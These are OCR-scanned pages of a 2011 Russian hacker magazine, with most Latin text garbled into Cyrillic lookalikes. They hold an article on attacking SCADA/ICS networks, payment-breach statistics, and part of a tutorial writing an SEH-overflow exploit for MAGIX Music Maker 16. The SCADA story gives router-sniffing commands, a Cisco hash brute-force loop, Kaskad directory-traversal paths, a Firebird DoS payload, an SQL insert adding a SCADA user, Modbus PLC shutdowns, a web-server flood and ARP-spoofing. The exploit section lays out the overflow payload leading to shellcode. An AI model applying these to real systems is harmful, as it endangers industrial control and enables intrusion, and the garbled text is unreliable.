• ТеепаЫе Ыеззиз (содержит несколько модулей прове- 
рок систем ЗСАйА и ряда программируемых логических 
контроллеров в коммерческой версии); 

• РарісІ7 Меіазріоіі Рго)есІ (там совсем все грустно: в 
разделе «ехріоііз/зсасіа/» всего лишь несколько пар узко- 
ориентированных сплоитов). 

Естественно, помимо специализированного софта в 
ход идет и традиционный инструментарий — например, 
сетевой сканер птар. Кстати, и он следит за последними 
тенденциями в информационной безопасности: недавно 
в нем появился плагин, позволяющий выявлять на узле 
заражение Зіихпеі’ом. 

Типовые угрозы 

Рассмотрим наглядно, какие угрозы влечет за собой 
типовая топология технологической сети. В ней выде- 



ляют (в зависимости от природы технологических про- 
цессов) три зоны: корпоративную (не имеет никакого 
отношения к управлению, занимается исключительно 
бизнес-процессами), исполнительную (звено, где непо- 
средственно выполняются технологические процессы 
— например, перерабатывается аммиак или осуществля- 
ется управление движением нефти) и зону диспетчериза- 
ции (там сидят операторы АСУ ТП, которые могут повли- 
ять на ход выполнения технологического процесса). 

1. Исполнительные устройства и подсистема телеметри- 
рования. 

Очень часто электронная компонентная база исполь- 
зуемых устройств не позволяет внедрить туда столь 
популярные технологии как ІРЭес или 55Ц организовать 
ѴРІЧ. Тем не менее, доступ к этим девайсам нужен всег- 
да. Более того, некоторые из них выступают в качестве 
устройств сбора информации (телеметрии) о показателях 
выполнения технологического процесса с датчиков и так 
далее. В них же могут накапливаться сообщения о трево- 
гах и авариях, что весьма критично. В связи с этим очень 
важно назначать им публично доступный ІР-адрес, что, 
к сожалению, встречается сплошь и рядом. В некоторых 
ситуациях избежать этого невозможно при допущениях 
ошибок проектировки сети. Например, современные 
промышленные контроллеры могут быть соединены 
напрямую или через модем. При подключении через 
модем их часто объединяют с 6РР5/65М-модемами, 
что по умолчанию наделяет устройство ІР-адресом 
мобильного оператора. При такой конфигурации они 
очень уязвимы для атак извне. Специализированными 
утилитами и методами злоумышленник может выявить 
подобные девайсы и натворить много плохих дел. Сами 
исполнительные устройства, как правило, подключаются 
по последовательному интерфейсу (Р5-232 / Р5-485) к 
МСЮВІІЭ-серверу, а непосредственно МСЮВІІЭ-сервер 
имеет управление по ТСР/ІР через канал Еібегпеі / 
Іпсіизіхіаі Еібегпеі с операторами. 

2. Парк АРМ-операторов и системы 5СА0А. 

Эти товарищи находятся в самом сложном положении, 
поскольку вопросы режима среди них зачастую не 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

Многие факты про- 
никновения хакеров в 
подобные системы так 
и остаются за кадром. 
То, что вырвалось на 
публику, попадает в 
специальные базы, 
одна из них — РІ5І: 
зесигіІуіпсісІеЫз.огд . 




> СІѴСІ 



• На дискеты найдешь 
сканер для обнару- 
жения зараженных 
ЭШхпеСом узлов от 
компании Тгепб Місго. 

• Кроме этого, на 
ОѴР доступен сканер 
уязвимостей ТеепаЫе 
Ыеззиз, который реа- 
лизует ряд проверок 
для систем 5 САБА. 
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С использованием специальных сканеров можно легко найти 
Зіаѵе-девайсы, работающие по протоколу МОРВІІЗ 



соблюдаются. Вторая проблема — к ним часто допускают иностран- 
ных специалистов, которые могут иметь не самые благие намерения. 
Например, в истории червя Біихпеі на атомной станции в Бушере 
ключевую роль сыграл инженер-инсайдер обслуживающего подраз- 
деления, который пронес на станцию ІІБВ-носитель с вредоносным 
софтом. Сколько таких товарищей бродит по атомным станциям в 
мире — остается вопросом. Операторы имеют возможность подклю- 
чаться к системе БСАйА, как правило, с разным уровнем привилегий, 
планировать и внедрять новые проекты, изменять существующие. 
Несмотря на множество уязвимостей в ПО систем диспетчеризации, 
основной угрозой по-прежнему остается инсайдерство. 

3. Корпоративная зона (ВАМ — Визіпезз Агеа Меіѵѵогк). 

В ней сидят люди, которые управляют с точки зрения бизнеса всем 
тем, что мы рассмотрели выше. Физически они часто находятся на 
значительном удалении от самого производства. В секторе энергети- 
ческих или нефтетранспортирующих организаций это особенно оче- 
видно. Все их хозяйство может находиться на различных континентах 




Выявлен НМІ - человеко-машинный интерфейс одной из систем 
диспетчеризации. Иногда такие вещи стоят на специальных 
промышленных компьютерах или стойках в цехах или заводах. 
Аптайм совсем небольшой, видимо после рестарта. Угроза 
проникновения на такой девайс чревата попаданием в сегмент 
технологической сети. 

— например, в виде линий энергогенерирующих комплексов или 
нефтяных вышек в Ливии, а сами они могут сидеть в какой-нибудь 
теплой безобидной стране. По-настоящему ВАЫ озабочена только 
одной задачей: извлечением прибыли, поэтому большую часть вре- 
мени они посвящают изучению биллинга, финансово-экономическим 
вопросам своего бизнеса. 



Как находить зараженныенншш^ узлы 





В состав ЫМАР’а новой версии (5.51 ) вошел интересный плагин, 
написанный на языке программирования ША для ЫМАРБсгірбпд 
Епдіпе, имя ему — зіихпеі-сіеіесі. Исследовать узел на предмет на- 
личия червя БФхпеІ: через БМВ-сессию очень просто: 
птар --5сгі рТ зФхпеЛсІеФсІ: -р 445 <Ьоз1> 

Кроме этого, для обнаружения зараженныхузлов можно пользо- 
ваться сканером, созданным специалистами компании Тгепб Місго. 
Взятьего можнолибо на нашем БУБ, либо на сайте компании ( ЬіЕ 
Іу/сЬокГа ]. Какже работа ютэти сканеры, и как вообще работает 
БіихпеІ? 

Біихпеі: регистрирует свой РРС-сервер для осуществления вну- 
треннего и внешнего взаимодействия с зараженными узлами в 
качестве отдельной ноды. Функционал РРС-сервера настроен на 
выдачу (проверку] версии червя, атакже на выполнение функции 
обновления (загрузку новых экземпляров]. Соответствующие РРС- 
вызовы могутбыть исполнены от центра управления этим «про- 
мышленным» ботнетом. Центр дает команду на проверку версии 
(0x00], в случае ее «старости» осуществляется вызов функции об- 
новления [0x04]. Предварительно проверяется доступность службы 
БМВ-оѵег-ТСР (ТСР 445], после чего эксплуатируются уязвимости, 
заложенные в данную версию БШхпе! (например, М510-061], осу- 
ществляется биндинг к характерному именованному па йпу через 
ОСЕ/РРС («//Ьгоѵѵзег» — в большинстве случаев], поиск 1)1) Ю и его 
последующий анализ. Красиво! 

Вторым способом является поиск«вгруженного» в планировщики 
задач зловредного кода БФхпеЕ На основе данной методики и 
работает сканер Тгепб Місго. 



■ - 1 - 
«*!Р* м.+ѵМіил' 
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В составе используемой 5САБА была известная СУБД РігеЬігб. К сожалению (или к счастью), в ней фигурировала уязвимость реализации 
атаки на отказ в обслуживании, а порт для подключения базы был доступен злоумышленнику. 



Поделюсь с тобой практической историей о том, как я проводил аудит 
системы диспетчеризации управления расходом тепловой энергией 
для жилых домов. Основной моей задачей было обнаружить суще- 
ствующие в системе уязвимости и осуществить удаленный доступ к 
ключевым элементам системы. 

Обозначив для себя диапазон сети, было решено выявить в нем 
пограничный шлюз доступа. Искать долго не пришлось, это был Сізсо 
Роиіег апб Бесигііу Оеѵісе Мападег на маршрутизаторе Сізсо 7301 , 
более известный в народе как СІ5С0 50М. Мне требовалось полу- 
чить к нему доступ, по возможности изучить его конфигурационный 
файл, обозначить для себя диапазоны внутренних сетей и выявить 
там самое ценное. 

Как ни странно, на самом шлюзе было целых две уязвимости: 

• обход авторизации Іеѵеі 15; 

• интегрированная учетная запись «сізсо» (шлюз был только введен 
в эксплуатацию, так что сами администраторы еще не успели там 
ничего наладить с безопасностью). 

Получив доступ, первым делом я вбил команду «збоѵѵ гиппіпд 
сопбд», чтобы просмотреть конфигурационный файл. Как и ожида- 



лось, внутри я обнаружил захэшированные пароли. 

Изучив подсети, я сразу взялся за анализ сети прямо с пограничного 
маршрутизатора. Естественно, эту задачу можно было решить двумя 
способами: 

• активно, с использованием скриптов ТСІ_, которые бы бегали по 
узлам сети и осуществляли подключения на известные порты для 
сбора информации о сервисах; 

• пассивно, здесь все немного сложнее, потому что только современ- 
ные прошивки оборудования СІ5С0 содержат Сізсо 105 ЕтЬесИесІ 
Раскеі Саріиге (ЕРС) — весьма полезную вещь, выступающую в каче- 
стве пакетного анализатора для диагностики сети. 

Чтобы не наделать много шума, я пошел по второму пути, для чего 
мне требовалось превратить шлюз в один большой сниффер, как раз 
с помощью ЕРС: 

# включение режима ЕХЕС 
епаЫе 

# задаем буфер захвата с именем "ркіігасеі", размером 256 байт, 

# с ограничением по максимальному размеру элемента буфера в 



Пароли на роутерах 



Иногда вместо ожидаемых «зесгеі: 7»-хэшей на СІ5С0-роутерах 
встречаются «зесгеі: 5» (СІ5С0 Іуре «5» раззѵѵогбз). Процесс полу- 
чения пароля по хешу отличен от взлома «зесгеі: 7», который можно 
расшифровать с помощью известных скриптов, Саіп апб АЬеІ и 
многих других программ. Пример того, как выглядят и хранятся 
хэши паролей: 

изегпате дЬавІі епаЫе зесгеі: 5 
$1$іІІдЗ$сО203ККСб7тН-РХ2К5ЬОдР. 

изегпате дЬазІі раззмогсі 7 07362Е59ѲЕ1В1СѲ41В1Е124СѲА2Р2Е2 
06832752Е1А01134й 

Нетрудно заметить, что алгоритм хэширования аналогичен тб5, 
поэтому в данном случае можно прибегнуть к помощи современ- 
ных программных средств, умеющих восстанавливать та кие типы 
хэшей, а именно Раззѵѵогбз Рго, 5обп ТЬе Ріррег, ЕС В и та к далее, 
чтобы провести атаку по словарю. Конструктивно это выглядиттак: 

$1$РККк$і2І\Ю(1)Р . ѵ55сМЬмІ)ІлІЕВІ\ІІІ0/ (Ііуре "5"), 
где «РККк» - соль (заіі:) 




Самодельный брутфорсер могбы выглядеть примернотак: 

орепззі раззмсі -1 -заіі: РККк сізсо 

На месте «сізсо» — перебирающиеся слова из словаря с паро- 
лями. 
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В недрах системы диспетчеризации ЗОАРА 



# 100 байт 

топіііог саріиге Ьи-Р-Рег ркігасеі зііе 256 тах-зііе 100 сігсиіаг 

# задаем точку захвата, в качестве интерфейса мониторинга 

# используем РазІіЕІібегпеІі., в отношении как входящего трафика, 

# так и исходящего 

топіііог саріиге роіпі ір се-Р ірсе-р-Ра0/1 -РазІіЕІіКіегпеІ: -Ііуре 
0/1 Ьоііі 

# ассоциируем точку захвата с буфером 

топіііог саріиге роіпі аззосіаііе ірсе-р-Ра0/1 ркігасеі 

# организация старта захвата 
топіііог саріиге роіпі зііагіі ірсе-р-Ра0/1 

# вывод захваченной информации 

зііоы топіііог саріиге Ьи-р-Рег ркітасеісіитр 

Обнаружив в трафике строки с указанием порта ТСР 502, мне 
многое стало ясно, потому что данный порт характерен для про- 
токола МСЮВІІ5 ТСР. По маршрутизации пакетов и адресу назна- 
чения можно было судить о том, где находится центр управления. 
Собственно, таким способом можно вести вполне полноценную 
пассивную сетевую разведку с маршрутизирующего оборудования, 



Наиболее интересные инциденты 



Русская компания НТЦ«Станкоинформзащита», занимающаяся 
безопасностью АСУТП, опубликовала аналитический отчете 
анализом инцидентов информационной безопасности АСУТП 
зарубежных государств за 2008-2010 годы. Наиболее интересные 
из НИХ: 

• / марта 2008 года. Блок 2 ядерной станции «Наісб» (штат 
Джорджиа, США], внештатное аварийное выключение на 48 
часов после установки обновления программного обеспечения 
(похожий инцидент случился в 2006 году на ядерной станции 
«Вгоѵѵпз Реггу» из-за нештатного сбоя программируемого 
логического контроллера при получении аномального выходного 
сетевого трафика из производственной сети); 

• Май 2008 года. Корпорация Теппеззее Ѵаііеу АіДбогТу (ТѴА) 

(в ведомости данной энергетической корпорации находятся 1 1 
угольных станций, 8 ТЭС, 3 ядерных станции, 29 ГЭС США), про- 
верка регуляторов (ОАО, НН5] выявила порядка 2000 уязвимостей 
разной степени критичности. Среди брешей в безопасности были 
выявлены сегменты производственной сети, подключенные к ин- 
тернету, множественные уязвимости прикладного ПО, отсутствие 
обновлений безопасности, ошибки в проектировании архитекту- 
ры сети и каналов обмена данными; 

• 26 августа 2008 года. Центр полетного планирования Феде- 
рального управления гражданской авиации США, диспетчерские 
трех десятков американских аэропортов выведены из строя в ре- 
зультате компьютерного сбоя в центре полетного планирования. 



в частности — с любого маршрутизатора СІ5С0, имеющего акту- 
альную версию прошивки. Запустив сканер, я понял, что там уже 
кто-то продуктивно побывал до меня: несколько узлов было зара- 
жено червем, каждый из которых образно говорил мне: «Мы ждем 
своего хозяина». Следует отметить интересный факт, что настройки 
по умолчанию многих систем БСАйА рекомендуют организовать 
анонимный доступ к йС0М ОС Місгозоіі ѴѴіпсІоѵѵз, что порождает 
огромные бреши в безопасности. Также многие из промышленных 
протоколов по ряду причин (сложность реализации на оборудова- 
нии телеметрии, увеличение объема трафика) не поддерживают 
шифрование. Тем временем, хэши, взятые из конфигурации БОМ, 
расшифровывались. На этот раз вместо родного СІ5С0 «зесгеі 7 » в 
качестве алгоритма хэширования применялся М05. 

Система диспетчеризации 

Расшифровав пароли, я начал изучать периметр сети. Некоторые из 
хостов имели алиасы внешних ІР-адресов, что позволяло мне под- 
ключиться к ним извне. Получив доступ к одной из рабочих станций 
в пределах сети, я начал проводить активный поиск всех устройств 
АСУТП с помощью софтины «БСАОА-Аудитор». Любой другой сканер 
показал бы мне доступные ТСР 502-порты, характерные для МСЮВІІБ, 
но установить нативное соединение и узнать оттуда служебную 
информацию — этого они, конечно, не умеют. С использованием 
«БСАОА-Аудитора» требовалось выявить в диапазонах сетей те узлы, 
которые содержат признаки размещения систем диспетчеризации 
или элементов телеметрии. Сделать это можно по целому ряду при- 
знаков, если знаешь, что искать. Одним из возможных критериев для 
поиска является вывод опроса БЫ МР- прото кола в случае его доступ- 
ности. Также в пределах самой сети, по административной панели и 
встроенному ѵѵеЬ-серверу, я нашел саму БСАйА — это была Каскад- 



Как меювиз передает данные 



В сетях М00ВІІ5 можетбыть использован один из двух способов 
передачи данных: А5СІІ или ВТІУ Пользователь выбирает необхо- 
димый режим вместе с другими параметрами (скорость передачи, 
режим паритета и так далее) во время конфигурации каждого 
контроллера. При использовании АБСІІ-режима каждый байт 
сообщения передается какдва АБСІІ-символа. Главное преиму- 
щество данного способа — время между передачей символов 
может быть до секунды без возникновения ошибокпри передаче. 
В А5СІІ- режиме сообщение начинается с «двоеточия» (:, А5СІІ ЗА 
Гіех] и заканчивается последовательностью «возврат каретки- 
перевод строки» (СВІ_Р, А5СІІ СЮ и ОА бех]. Допустимые символы 
для передачи — это шестнадцатиричные цифры 0-9, А-Р. Монитор 
сетевого устройства в сети непрерывно отслеживает символ 
«двоеточие». Когда он принят, каждое устройство декодирует 
следующее поле сообщения (поле адреса] и такдалее. 



► 058 
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Проект технологического процесса - похоже на схему тепловой сети 

АСУ. Изучив систему, я выявил целый ряд уязвимостей: 

1) Неавторизированное чтение директории с проектом технологиче- 
ского процесса: КАЗКА0/ѴѴеЬ_СІпТбІІ/5ЬоѵѵРаде?ѴѴеЬ_СІпСіпі. Из 
него же можно узнать полный путь до базы: 

Рго]есС="С : \Рго§гаш Рі1е5\Ка5касІ\Ргодес1:5\ 
КѴІ5Іоп0етоРподес1:\ка5касІ . крг" 

2) Раскрытие пользовательской информации: КА5КА0/\Л/еЬ_СІп1сІІІ/ 
ЗЬоѵѵРаде?../. ./../Рго]ес1;5/КѴізіоп0еппоРго]ес1;/СопТід игаТог/ЕѵепТз.іпі 

3) Чтение пароля и юзера к базе данных 

ІІ5егЫате=5у5СІЬа 

Раз5ѵѵогсІ=ЬРВЕФГЪФИ (пароль извлекается ХОР’ом на 0x1 В) 

4) Раскрытие служебной информации: 

КА5КА0/ѴѴеЬ_СІпЫІІ/ЗЬоѵѵРаде?../../../Рго]есі5/КѴІ5ІопВетоРго]ес1:/ 

Сопбдигаіог/Зіаііопз.іпі 

С1п1:ІРАсІг1=127 .0.01 
Порт = 3050 

5) Отказ в обслуживании с помощью записи в порт ТСР 3050 сле- 
дующей строки (уязвимость характерна для СУБД РігеЬігсІ): 

\х00\х00\х00\х35\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а\х4а 

\х4а\х4а\х4а 

6) Неавторизированное добавление пользователя ЗСАйА: 

ІМ5ЕКТ ІІЧТО ІІБЕКИБТ (ІІБЕКМАМЕ, ЦБЕКРАББІлЦ ИАМЕ, СКРИАМЕ, 
РЦШЧАМЕ, ПАСБ, РІ_АС5_, АНОІлІТІМЕ, КЕСІБТЕКТІМЕ , 
І_АБТЕІ\ІТЕКТІМЕ л ІАБТРІлЮСНАІ\ІСЕТІМЕ, РІлЮКЕЕРРЕКІСЮ, 5ТАТІСМ5, 
РКОРТІМЕОІІТ, РБРКйАССЕББ, Р5РІЛІКАССЕ55, Р5РК0АССЕ55_, 
Р5Р1лІКАССЕ55_) ѴАШЕ5 ( ' ІТй ' ' 745Р87А6В56ВАСАВ ' , ' І1=с1 ', 

'Пользователи Д Юрий КаминковД Ъ, пиіі, пиіі, '2002- 
01-30 13:11:36.0', '2002-01-30 13:11:36. 0', '2002-01-30 
13:11:36.0', 0, пиіі, пиіі, пиіі, пиіі, пиіі, пиіі); 

Не МСЮВиЗ'ом единым! 

Обнаружив узлы телеметрии, управляемые по МОйВІІЗ, я взялся за 
работу. Поковырявшись в протоколе, можно выявить много интерес- 
ных особенностей. 

1) Например, существует возможность перевести устройства РІ_С 
в режим Іізіеп опіу. Данный режим позволяет отключить РІ_С от 
обработки и исполнения команд на некоторый интервал време- 
ни, что может привести к останову системы в целом. Согласно 
архитектуре МОйВІІЗ только одно устройство (Мазіег) может ини- 
циировать передачу (сделать запрос). Другие устройства (Зіаѵе) 





Контроллер М00В115 для энергетической отрасли. Одно из его 
назначений - выполнение телеметрирования 

передают запрашиваемые главным устройством данные или про- 
изводят запрашиваемые действия. Типичное главное устройство 
включает в себя ведущий (Н05Т) процессор и панели программи- 
рования. Типичное подчиненное устройство — программируемый 
контроллер. Перевод РІ_С -устройств в режим Іізіеп опіу реализу- 
ется с помощью рассылки специальных пакетов либо конкретному 
зіаѵе-устройству, либо сразу всем подчиненным устройствам с 
помощью широковещательного запроса. Зіаѵе-устройство возвра- 
щает сообщение в ответ на запрос, адресуемый именно ему. При 
широковещательных запросах ответы не возвращаются. 

2) Другой характерной ошибкой (правда, никак не связанной с 
реализацией протокола) является некорректная обработка вход- 
ных данных на стороне устройства, работающего с промышлен- 
ным протоколом. Разработчики зачастую забывают контролиро- 
вать предельные размеры пакетов, что приводит к крешу и нару- 
шает работу устройства. Например, драйвер МобЬиз ЗСАйАРаск 
известного пакета СІеагЗСАОА, способен обрабатывать пакеты 
от 60 до 260 байт. Что будет с девайсом, если заслать ему пакеты 
подлиннее, можешь проверить сам :). 

3) Схожей проблемой являются ошибки проектирования штат- 
ных служб и сервисов, используемых на контроллерах. Начиная 
с интегрированных ѵѵеЬ-серверов и заканчивая Лр-демонами. 
Скажем, известный АррѵѵеЬ ЕтЬесИесІ ѴѴеЬ Зегѵег валится с 
помощью флуда, генерируемого утилитой Арасбе Вепсбтагкіпд 
Тооі (аЬ), пример: 

аЬ -п 1000 -с 50 Іі1:1:р://ххх.ххх.ххх.ххх/іпсІех.Іт1:т1 
-п - суммарное количество запросов 
-с - количество одновременных запросов 

4) Поделюсь с тобой одной хитрой уловкой. Если отключить один из 
контроллеров телеметрии М00ВІІ5, у Администратора начнется пани- 
ка, и он точно полезет туда, чтобы перезагрузить контроллер, а потом 
зайдет в админку, чтобы посмотреть все настройки. Здесь-то можно 

и перехватить его пароль, отсниффав трафик в сегменте ЛВС с помо- 
щью АРР-спуфинга. 

У нас проблема 

Беда существующей нормативной базы очевидна: нет ясных и явных 
требований к столь критически важным системам как АСУТП и, в 
частности, ЗСАйА. Недавно наши специалисты обнаружили типовое 
ТЗ, нашедшее свою реализацию в одной из автоматизированных 
информационно-измерительных систем коммерческого учета электро- 
энергии (АИИС КУЭ). Требования по защите от несанкционированного 
доступа, согласно РД ФСТЭК РФ, которые учитывались разработчика- 
ми, — 2Б. К сожалению, данный класс не учитывает множество вопро- 
сов, таких как сигнализация попыток нарушения защиты, контроль 
доступа субъектов к программам, узлам сети, каналам связи, и много 
чему еще. Проблема! т 
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БЕЗОПАСНОСТЬ ПЛАТЕЖЕЙ 

Мировой рынок электронных платежей составляет больше десяти триллионов долларов в год, и эти деньги 
притягивают к себе огромное количество киберпреступников. Что насчет статистики по типам и источникам 
угроз? Каждая крупная компания, занимающаяся безопасностью электронных платежей, публикует отчеты о 
своей деятельности. Среди разнообразных цифр и графиков попадаются весьма занимательные данные. 



ПРОИСХОЖДЕНИЕ АТАК 

Согласно отчету компании Тгизіѵѵаѵе, 32% атак на платежные системы осуществляются из России. Впрочем, сюда можно смело плюсовать и 
24% атак, происхождение которых аналитикам установить не удалось: видимо, ѴРЫ + зоскз сЬаіп сделали свое дело, и часть российских хаке- 
ров сумела скрыть свое происхождение. В отчете компании Ѵегізоп эту проблему решили просто: 65% случаев атак они классифицировали как 
происходящие из «Восточной Европы». 



Канада 




Великобритания 
Нидерланды 



Франция 



Германия 
Австрия 
Польша 
Словакия 
Украина 
Румыния 



Турция 



Россия 




г„ 


ІО/1 


132 


Ш 



Китай 



Тайвань 



Италия 



Вьетнам 



Малазия 




Индонезия 



Колумбия 



24 % 



Происхождение неизвестно 



ВРЕМЯ РЕАКЦИИ 

Изучая такой важный параметр как время обнаружения индидента, аналитики ТгизД/ѵаѵе пришли к неутешительным результатам. Даже компании, 
которые серьезно занимаются собственной безопасностью, замечают утечку в среднем лишь через месяц после того, как она произошла. Остальные 
компании порой не укладываются и в полгода. 



Самостоятельное обнаружение 
28 Дней 




ДНИ 50 100 150 



► обо 



ХАКЕР 07 /1 50/ 201 1 





ТИПЫ УГРОЗ 

Любопытно, что больше половины случаев утечек данных, по мнению Тгизіѵѵаѵе, происходят из-за удаленного доступа к приложениям, когда 
злоумышленникам известны логины и пароли. Ѵегізоп смотрит на классификацию угроз несколько более детально: изучив более 800 случаев 
утечек данных из финансовых систем, специалисты пришли к выводу, что 90% утекших записей утекли из-за разнообразных форм удаленно- 
го взлома, и только 10% записей пострадали из-за инсайдерства и физической кражи информации. 



Недостаки 

парольной 

защиты 



Социальная инженерия 
Почтовый троян 
ЗШ-инъекции 

Уязвимости в СМ3 
Инсайдерство 

Физический доступ 
Удаленный доступ 
к файлам 

Неизвестно 




Использование бекдоров 
Использование паролей по умолчанию 
Брутфорс и атаки по словарю 
Фут-принтинг и фингер-принтинг 
Использование украденных паролей 
5(ЗІ_-инъекции 
Недостаточная аутентификация 
Злоупотребление функциональностью 
Переполение буфера 
Недостаточная авторизация 
Межсайтовый скриптинг 
Подделка межсайтовых запросов 
Криптоанализ 
Бо5 на уровне приложения 
Брутфорс криптозащиты 
Другое 
Неизвестно 



Использование различных хакерских 
техник по версии Ѵегізоп 




73 %/ 45 % 

67 %/ 30 % 



НАРУШЕНИЯ РСІ 085 

Как известно, существует специальный стандарт для обеспечения безопасности данных в платежной индустрии. Однако то обстоятельство, что любая 
финансовая организация проходит обязательную сертификацию по РСІ 038, никак не влияет на количество украденных денег. Аналитики утверждают, 
что дело не в том, что стандарт какой-то не такой, а в том, что многие компании его саботируют. 
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Ищем уязвимость и пишем эксплойт 
дляШ$іс1Иакег16 

в Здравствуйте, дорогие любители эксплойтостроения! Сегодня мы 
познакомимся с немецкой компанией МА6ІХ А6 и ее продуктом Мизіс 
Макет 16. В процессе нашего знакомства мы найдем уязвимость 
нулевого дня, а также напишем эксплойт, который будет обходить 
РЕРи А5І.Р. 



Предыстория 

Началась эта история с того, что автор, как обычно, на работе с 
чашкой чая и пончиком в зубах читал новостную ленту (вот так 
работают в Оідііаі ВесигіТу]. Мое внимание привлек заголовок 
«МА6ІХ АО угрожает судебным преследованием специалисту по 
безопасности». Суть была примерно в следующем: шведский 
парень Асібдеп из тусовки Согеіап Теат нашел уязвимость в 
продукте компании МАОІХ АО под названием Мизіс Макет 16. 
После чего он написал письмо разработчикам, где сообщил 
всю инфу о баге и сказал, что после патча опубликует ее вместе 
с РоС. Вроде бы ситуация классическая, и такие истории про- 
исходят каждый день с самыми разными компаниями. Однако 
немцы не оценили добрые намерения шведского хакера и вместо 
того, чтобы сказать парню спасибо, обратились в суд. По всей 
видимости, работники МАОІХ АО не очень-то в курсе того, как 
следует себя вести в таких ситуациях. Что ж, им же хуже: сейчас 
я покажу, как даже без РоС любой баг-хантер может разнести их 
программу на куски. 



Ищем Осіау 

Скачав триал Мизіс Макет 16, можно начать искать баги. Как 
известно, обычно уязвимости ищут фаззингом или статическим 
анализом. Но прежде чем начать использовать артиллерию, 
следует просто взглянуть на то, как работает программа. Итак, 
данный продукт предназначен для монтирования и сведения 
аудиоматериалов. Каждый проект объединяет в себе несколько 
аудиофайлов, их привязку к дорожкам, времени и так далее. 
Собственно, файл проекта, имеющий расширение .ттт, и явля- 
ется первой нашей фаззинговой мишенью. 

Прежде всего, откроем файл демо-проекта _Оето.пппппп в любом 
НЕХ-редакторе (например, 01 0-Ебііог). Простого взгляда доста- 
точно, чтобы увидеть, как файлы с контентом (звуковые файлы) 
поступают в проект. Строки с путями и именами файлов просто 
разделены нулевыми байтами. Поскольку нигде не указан размер 
этих строк, то можно предположить, что Мизіс Макет определяет 
конец строки по нулевому байту. Логично предположить, что если 
ПО не считает размер строки при копировании, а тупо идет до 



► 0б2 
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Твиттер — многие белые шляпы общаются именно 
здесь 

нулевого байта, то возможна классическая уязвимость — пере- 
полнение буфера. Чтобы быстро проверить эту гипотезу, руками 
затрем нули после имени файла, заменив их, к примеру, на 
'а'. Выполнив это простое редактирование, можно попытаться 
открыть файл проекта в программе и... она с треском упадет. Что 
ж, теперь еще раз повторим открытие проекта. Только на этот 
раз присоединимся дебагером (я использую Іттипііу ОеЬидег) к 
процессу Мизіс Макегдо открытия файла. В результате дебагер 
покажет причину падения и исключительную ситуацию — чтение 
по несуществующему адресу. Так как возник Ассезз Ѵіоіаііоп, это 
заставит программу перейти к обработчику исключительной ситу- 
ации, указатель на который находится в стеке, который... мы тоже 
переписали значением байта 'а' из .ттт файла. Вот, в общем, 
мы и нашли Обау-уязвимость без применения тяжелой артилле- 
рии, буквально за пару-тройку минут. 

Как я понял, шведский хакер Асібдеп нашел другую уязвимость, 
зато нашу уязвимость параллельно и независимо нашел лидер 
команды Согеіап — СогеІапсобЗг, автор известной примочки 
рѵебпбаббг. Но у него свой путь, а у нас — свой. Вообще, неуди- 
вительно, что одну и ту же уязвимость находят несколько человек, 
особенно такую простую и очевидную :). 

Эксплойт 

Найдя уязвимость, я выложил скриншот бага, чтобы донести до 
создателей софта простую мысль: для нахождения уязвимости 
совершенно не нужен никакой РоС, достаточно абстрактного ука- 
зания «в софтине Мизіс Макет есть бага». Кстати, опубликован- 
ный скриншот с ошибкой никаким образом нельзя считать вредо- 
носным кодом, поэтому я абсолютно чист перед законами ФРГ и 
РФ. Однако очевидно, что информации со скриншота достаточно, 
чтобы любой другой человек нашел уязвимость. Так и получи- 
лось: наш читатель, известный мне под ником йопігіГ, без труда 
докопался до сути проблемы и даже написал эксплойт! Суть его 
проста: перезаписываем БЕН-указатель на адрес инструкции рор 
РЕО/рор РЕѲ/геІп, который предварительно нашли в программе, 
в какой-нибудь подгруженной ДЛЛ-ке без БаГеБЕН (что неслож- 
но, так как вендор не потрудился включить защиту заГеБЕН). Это 
приведет к тому, что когда случится Ассезз Ѵіоіаііоп, управление 
перейдет по данному указателю... а там у нас рор/рор/геіп. Это 
значит, что 8 байт из стека уйдут, и указатель Е5Р опустится на 
8 байт выше («опустится выше» — добро пожаловать в матрицу). 

А восемью байтами ниже, по правилам игры, должен находить- 
ся указатель на наш переписанный БЕН-заголовок, только на 
четыре байта выше, где должен быть указатель на следующее 
звено БЕН-цепочки. Таким образом, РЕТІЧ возьмет указатель на 
наш переписанный указатель и вернет ЕМУ управление, то есть 
ЕІР будет указывать на переписанный нами стек на то место, 
где должен быть указатель на следующий БЕН. Поэтому вместо 
указателя надо писать туда инструкцию ОМР +0x1 2 (это для того, 
чтобы перепрыгнуть указатель на БЕН-дескриптор, который у нас, 
если ты помнишь, четырьмя байтам дальше). Таким образом, имя 




Продолжение атаки и РОП-программа 2, уже в куче 



«файла» во входном .ттт -проекте должно иметь следующий 

ВИД: 

аааа...ааааХХХХѴѴѴѴ22222222222... 
аааа...аааа - буфер 

ХХХХ - указатель на следующий БЕНЦ а на самом деле - 0Х909010ЕВ 
(ИМР +0х12/пор/пор) 

УУУУ - указатель на БЕН-дескриптор, а на самом деле - адрес 
любой рор/рор/ге1:п инструкции 
2222 - куча ІМОР и шеллкод 

В этом случае ход выполнения программы такой: 

1. Грузим файл; 

2 . Ассезз Ѵіоіабоп; 

3. Переход по УУУУ; 

4 . РОР/РОР/РЕТІЧ => Исполняется ХХХХ; 

5 . ХХХХ = ШР +0x1 2; 

6. Исполняется 22222, т.е шеллкод. 

Все здорово, только эксплойту меня не заработал. Причин 
несколько. Поскольку у меня ѴѴіпсІоѵѵз 7 х64, то я защищен йЕР и 
А5І_Р. Из-за этого выбранное опігіГ значение УУУУ указывало на 
сІІГку, которая прыгала в памяти из-за А5І_Р и ВазеЕіхІіР. А даже 
если поменять УУУУ на то, что надо, УУУУ и 2222 не будут испол- 
нятся, так как йЕР не даст исполнится коду из неисполняемого 
участка памяти — стека. Таким образом, эксплойт работает только 
в среде ѴѴіпсІоѵѵз ХР. Чуть позже опігіГ случайно сделал еще одну 
версию эксплойта, исправив один байт из УУУУ на нулевой. В 
таком варианте Ассезз Ѵіоіаііоп не происходило, так как програм- 
ма воспринимала ввод как две строчки (из-за нулевого байта). 

При этом переписывалось значение адреса возврата из функции 
на указатель кучи, причем ровно на место УУУУ! Удивительное, 
магическое везение, как потом описывал данное событие опІгіГ 
В этом варианте после выхода из функции программа передава- 
ла управление в кучу на место УУУУ. Это позволяет не думать об 
А5І_Р, но не решает проблему с йЕР. 

КОР-эксплойт 

Самое время вспомнить о возвратно-ориентированном про- 
граммировании. Год назад я уже писал о таких эксплойтах, время 
повторить изученное, но на более сложном примере. Дело в том, 
что наш буфер в стеке обрезанный. Хоть мы и переполняем буфер 
в стеке, мы ограничены длиной, которую программа считывает 
